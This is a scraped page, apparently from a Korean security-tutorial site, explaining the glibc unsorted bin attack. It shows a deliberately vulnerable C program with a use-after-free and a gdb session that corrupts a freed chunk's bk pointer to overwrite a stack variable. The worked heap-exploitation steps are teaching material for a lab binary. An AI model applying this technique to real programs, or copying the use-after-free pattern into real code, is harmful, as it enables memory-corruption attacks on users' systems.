Excuse the ads! We need some help to keep our site up.

List

Conditions

Exploit plan

Exploit point

  for (;; )
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
			...

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

			...
		}

unsorted_chunks() 함수는 main_arena.top 의 주소를 리턴 합니다.

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>

int main(){
        long state = 0;

        printf("Stack : %p\n", &state);
        char *buf1 = malloc(130);
        char *buf2 = malloc(500);

        free(buf1);

        scanf("%16s",buf1);

        buf1 = malloc(130);

        if(state){
                printf("Hello world!\n");
        }
}

Exploit flow

Debugging

gdb-peda$ b *0x00000000004006c6
Breakpoint 1 at 0x4006c6
gdb-peda$ b *0x00000000004006dc
Breakpoint 2 at 0x4006dc
gdb-peda$ b *0x00000000004006e6
Breakpoint 3 at 0x4006e6
gdb-peda$ b *0x00000000004006fd
Breakpoint 4 at 0x4006fd
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/unsortedBinAttack 
Stack : 0x7fffffffe258

Breakpoint 1, 0x00000000004006c6 in main ()
gdb-peda$ p main_arena.bins[1]
$1 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>

gdb-peda$ x/84gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000000
0x602090:	0x0000000000000000	0x0000000000000201
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000000
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000000
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000000
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000000000
0x602290:	0x0000000000000000	0x0000000000020d71
gdb-peda$
gdb-peda$ c

Continuing.
Breakpoint 2, 0x00000000004006dc in main ()

gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602000
gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x602020:	0x0000000000000000	0x0000000000000000

gdb-peda$ ni
AAAAAAAABBBBBBBB

gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x4141414141414141	0x4242424242424242
0x602020:	0x0000000000000000	0x0000000000000000

0x00000000004006e1 in main ()
gdb-peda$ set *0x602010 = 0x00007ffff7dd37b8
gdb-peda$ set *0x602014 = 0x00007fff
gdb-peda$ set *0x602018 = 0x7fffffffe258 - 16
gdb-peda$ set *0x60201c = 0x7fff
gdb-peda$ x/6gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x00007ffff7dd37b8	0x00007fffffffe248
0x602020:	0x0000000000000000	0x0000000000000000
gdb-peda$
gdb-peda$ c
Continuing.

Breakpoint 3, 0x00000000004006e6 in main ()
gdb-peda$ x/gx 0x7fffffffe258
0x7fffffffe258:	0x0000000000000000

gdb-peda$ ni
0x00000000004006eb in main ()

gdb-peda$ x/gx 0x7fffffffe258
0x7fffffffe258:	0x00007ffff7dd37b8
gdb-peda$ x/gx 0x00007ffff7dd37b8
0x7ffff7dd37b8 <main_arena+88>:	0x0000000000602290
gdb-peda$ p &main_arena.top 
$3 = (mchunkptr *) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.bins[1]
$10 = (mchunkptr) 0x7fffffffe248
gdb-peda$ 
gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006fd in main ()
gdb-peda$  ni
Hello world!

0x0000000000400702 in main ()
gdb-peda$

Related information